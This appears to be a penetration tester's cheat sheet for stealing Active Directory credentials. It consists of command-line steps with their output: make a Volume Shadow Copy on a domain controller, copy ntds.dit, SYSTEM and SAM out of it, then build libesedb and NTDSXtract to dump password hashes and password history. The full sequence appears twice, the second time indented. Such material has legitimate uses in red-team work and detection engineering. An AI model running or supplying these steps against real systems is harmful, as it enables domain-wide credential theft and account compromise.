jstnkndy/Volume Shadow Copy

## Volume Shadow Copy
# Start the Volume Shadow Service

C:\bak>cscript vssown.vbs /start

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Signal sent to start the VSS service.

# Create a Volument Shadow Copy, C is the drive where the files reside, this may not always be C

C:\bak>cscript vssown.vbs /create C
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to create a shadow copy.

# List the Shadow Copy output

C:\bak>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

[*] ID:                  {XXX}
[*] Client accessible:   True
[*] Count:               1
[*] Device object:       \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4
[*] Differential:        True
[*] Exposed locally:     False
[*] Exposed name:
[*] Exposed remotely:    False
[*] Hardware assisted:   False
[*] Imported:            False
[*] No auto release:     True
[*] Not surfaced:        False
[*] No writers:          True
[*] Originating machine: DS-DC03.ds.xxx.yyy
[*] Persistent:          True
[*] Plex:                False
[*] Provider ID:         {XXX}
[*] Service machine:     DS-DC03.ds.xxx.yyy
[*] Set ID:              {XXX}
[*] State:               12
[*] Transportable:       False
[*] Volume name:         \\?\Volume{XXX}\

# Copy the ntds.dit, SYSTEM, and SAM to your local directory from the volume shadow copy location above (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4)

C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SYSTEM .
        1 file(s) copied.

C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SAM .
        1 file(s) copied.

C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\ntds\ntds.dit .
        1 file(s) copied.

# or at C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\ntds\ntds.dit .
# this can also be on another drive such as E:\ so make sure you check that, if that's the case, make a shadow copy of that drive the same as C above

# At this point you will need to copy the ntds.dit, SYSTEM, and SAM to your box by whatever means you would like

# You will need to download the following tools to extract the data out of the files we've copied

wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz # thank mubix for this link!

tar zxvf libesedb-alpha-20120102.tar.gz
unzip ntdsxtract_v1_0.zip

root@host:~/# cd libesedb-20120102
root@host:~/libesedb-20120102# ./configure
root@host:~/libesedb-20120102# make

root@host:~/libesedb-20120102# cd esedbtools/
root@host:~/libesedb-20120102/esedbtools# ./esedbexport ntds.dit

cd NTDSXtract 1.0/

python dsusers.py <datatable> <link table> --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive
	# Start the Volume Shadow Service

	C:\bak>cscript vssown.vbs /start

	Microsoft (R) Windows Script Host Version 5.8
	Copyright (C) Microsoft Corporation. All rights reserved.

	[*] Signal sent to start the VSS service.

	# Create a Volument Shadow Copy, C is the drive where the files reside, this may not always be C

	C:\bak>cscript vssown.vbs /create C
	Microsoft (R) Windows Script Host Version 5.8
	Copyright (C) Microsoft Corporation. All rights reserved.

	[*] Attempting to create a shadow copy.

	# List the Shadow Copy output

	C:\bak>cscript vssown.vbs /list
	Microsoft (R) Windows Script Host Version 5.8
	Copyright (C) Microsoft Corporation. All rights reserved.

	SHADOW COPIES
	=============

	[*] ID: {XXX}
	[*] Client accessible: True
	[*] Count: 1
	[*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4
	[*] Differential: True
	[*] Exposed locally: False
	[*] Exposed name:
	[*] Exposed remotely: False
	[*] Hardware assisted: False
	[*] Imported: False
	[*] No auto release: True
	[*] Not surfaced: False
	[*] No writers: True
	[*] Originating machine: DS-DC03.ds.xxx.yyy
	[*] Persistent: True
	[*] Plex: False
	[*] Provider ID: {XXX}
	[*] Service machine: DS-DC03.ds.xxx.yyy
	[*] Set ID: {XXX}
	[*] State: 12
	[*] Transportable: False
	[*] Volume name: \\?\Volume{XXX}\

	# Copy the ntds.dit, SYSTEM, and SAM to your local directory from the volume shadow copy location above (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4)

	C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SYSTEM .
	1 file(s) copied.

	C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SAM .
	1 file(s) copied.

	C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\ntds\ntds.dit .
	1 file(s) copied.

	# or at C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\ntds\ntds.dit .
	# this can also be on another drive such as E:\ so make sure you check that, if that's the case, make a shadow copy of that drive the same as C above

	# At this point you will need to copy the ntds.dit, SYSTEM, and SAM to your box by whatever means you would like

	# You will need to download the following tools to extract the data out of the files we've copied

	wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
	wget https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz # thank mubix for this link!

	tar zxvf libesedb-alpha-20120102.tar.gz
	unzip ntdsxtract_v1_0.zip

	root@host:~/# cd libesedb-20120102
	root@host:~/libesedb-20120102# ./configure
	root@host:~/libesedb-20120102# make

	root@host:~/libesedb-20120102# cd esedbtools/
	root@host:~/libesedb-20120102/esedbtools# ./esedbexport ntds.dit

	cd NTDSXtract 1.0/

	python dsusers.py <datatable> <link table> --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive